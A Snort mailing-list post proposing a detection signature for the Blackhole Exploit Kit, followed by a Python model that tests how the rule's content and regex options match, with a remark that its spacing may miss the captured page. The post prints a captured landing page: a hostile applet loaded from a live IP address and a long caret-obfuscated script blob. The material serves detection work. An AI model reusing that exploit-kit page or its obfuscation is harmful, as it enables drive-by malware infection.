Snort mailing list archives
Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet
From: Community Proposed <lists () packetmail net>
Date: Tue, 21 Feb 2012 13:16:17 -0600
12:08:49.734573 IP 65.75.137.95.80 > a.b.c.d.3586: . 1:1461(1460) ack 567 win 6792

HTTP/1.1 200 OK
Date: Tue, 21 Feb 2012 19:30:23 GMT
Server: nginx/0.7.65
Content-Type: text/html
X-Powered-By: PHP/5.3.2
Connection: close
Transfer-Encoding: chunked

4ef
<html><body><applet code='Photo.class' archive='http://65.75.137.95/content/jav.jar'><param value="vssMlgg=9Po9Pd%oP/9gOFU6gYPMvM-Vcd=G6cr" name="p"/></applet><div style="display:none;"><p>@wpg9p@^p^@pg^p@9pgwp^4p4p^^p^2pg3p^4p@9p-2p-3pzwp@^p@9pgwp^4p@9p^2p20pzwpg2p^p20p3wpggp@9p@@p^3p@9p-z0p^^p@@pg3p^4p-z0p^0p@@pgzp@9p-z0pg3p^3p-z0pggpg9p@@p@wpg3pgwpgzp4p4p4pzwp@pg2p^p20pzwp@p@^p@9pgwp^4p@9p^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^4pg3pg9pgwp-z0p@9pgwp@wp@3p^2p@9p@wpg3p^2p@9p@^p^4p-2p-zpwzpw3p^gp@@p^2p-z0p^0p@wpg0p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zp2pg0pggp@@p^3pg2p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zpz^p^4p^2p^9pwzp^gp@@p^2p-z0p3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4pz9pwzp^gp@9p^2p^3pg3pg9pgwpzgp-wpgp4pz3p4pz2p-wp2pgwp@@pg^p@9pzgp-wp3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4p-wp2pg2p@@pgwp@wpggp@9p^2pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@^p2p@gp2p@@p-zpwzp^2p@9p^4p^@p^2pgwp-z0pg0p^@pgwp@^p^4pg3pg9pgwp-2p-zpwzp@^p-2p@gp2p@@p-zpw3pw3p2pg3p^3p2gp@9pg0pg3pgwp@9p@wpzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-z0p^4p^9p^0p@9pg9pg0p-z0p@gp-9pz9p-wp^@pgwp@wp@9pg0pg3pgwp@9p@wp-wpw3p2pg3p^3p23p^2p^2p@@p^9pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-2p @p@@p^2p^2p@@p^9p@pg3p-zp4p^4p@9p^3p^4p-2p3^p@gpg4p@9p@^p^4p4p^0p^2pg9p^4pg9p^4p^9p^0p@9p4p^4pg9
333

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet"; flow:established,from_server; content:"<html><body><applet|20|"; fast_pattern; content:"|20|code="; distance:0; content:"|20|archive="; distance:0; content:"|3a|none|3b|"; distance:0; nocase; pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi"; classtype:trojan-activity; reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; sid:x; rev:1;)

Thanks,
Nathan

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
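To see what the proposed rule's options would and would not match on a body shaped like the captured one, here is an added Python model of the rule's content chain and pcre. It is not the poster's code and not Snort; it reproduces the relative-match semantics of distance:0 and nocase and the rule's regular expression in Python's re module. The sample body it builds is constructed (made-up token blob, placeholder host applet.example), not the captured payload.

```python
import re

# Content matches from the proposed rule, in the order Snort evaluates them.
# Every one after the first carries distance:0, so its search starts at the
# byte where the previous match ended.  |20| is a space, |3a| ':' and |3b| ';'.
CONTENT_CHAIN = [
    ("<html><body><applet ", False),   # fast_pattern; case-sensitive
    (" code=", False),
    (" archive=", False),
    (":none;", True),                  # nocase
]

# pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi": fifty or more carets, each preceded
# only by characters from the class (@, hyphen, letters, digits).  Snort's O
# flag lifts the PCRE match limit for this expression; i maps to IGNORECASE.
CARET_RUN = re.compile(r"([@\x2da-z0-9]*?\x5e){50,}", re.IGNORECASE)


def content_chain_matches(body: str) -> bool:
    """Apply the four content matches relatively, the way distance:0 chains them."""
    pos = 0
    lowered = body.lower()   # ASCII payload assumed, so offsets line up
    for needle, nocase in CONTENT_CHAIN:
        idx = lowered.find(needle.lower(), pos) if nocase else body.find(needle, pos)
        if idx < 0:
            return False
        pos = idx + len(needle)
    return True


def caret_run_length(body: str) -> int:
    """Longest run of caret-terminated tokens drawn from the rule's character class."""
    best = 0
    for m in re.finditer(r"(?:[@\x2da-z0-9]*\^)+", body, re.IGNORECASE):
        best = max(best, m.group(0).count("^"))
    return best


def rule_fires(body: str) -> bool:
    """True when both the content chain and the pcre would match this body."""
    return content_chain_matches(body) and CARET_RUN.search(body) is not None


def sample_page(carets: int) -> str:
    """Constructed body in the shape of the captured one: an applet tag, a hidden
    div and a blob of caret-separated tokens.  Host and blob are made up."""
    blob = "".join(f"@{i % 10}p^" for i in range(carets))
    return (
        "<html><body><applet code='Photo.class' "
        "archive='http://applet.example/content/jav.jar'>"
        "<param value=\"x\" name=\"p\"/></applet>"
        "<div style=\"display:none;\"><p>" + blob + "</p></div></body></html>"
    )


if __name__ == "__main__":
    body = sample_page(60)
    print("caret run:", caret_run_length(body))
    print("content chain:", content_chain_matches(body))
    print("rule fires:", rule_fires(body))
    print("rule fires with two spaces before code=:",
          rule_fires(body.replace("<applet code=", "<applet  code=")))
```

Two things fall out of running it. The pcre alone fires on any page carrying fifty carets in a run of such tokens, which is why the content anchors matter for keeping false positives down. And in this model the first content consumes the space after applet, so |20|code= with distance:0 only lines up when a second space precedes code=; the captured body shows <applet code= with a single space, so replaying that body through a Snort test bed is worth doing before relying on the rule, and dropping the trailing |20| from the first content (or the leading one from the second) would make the chain match the body as captured.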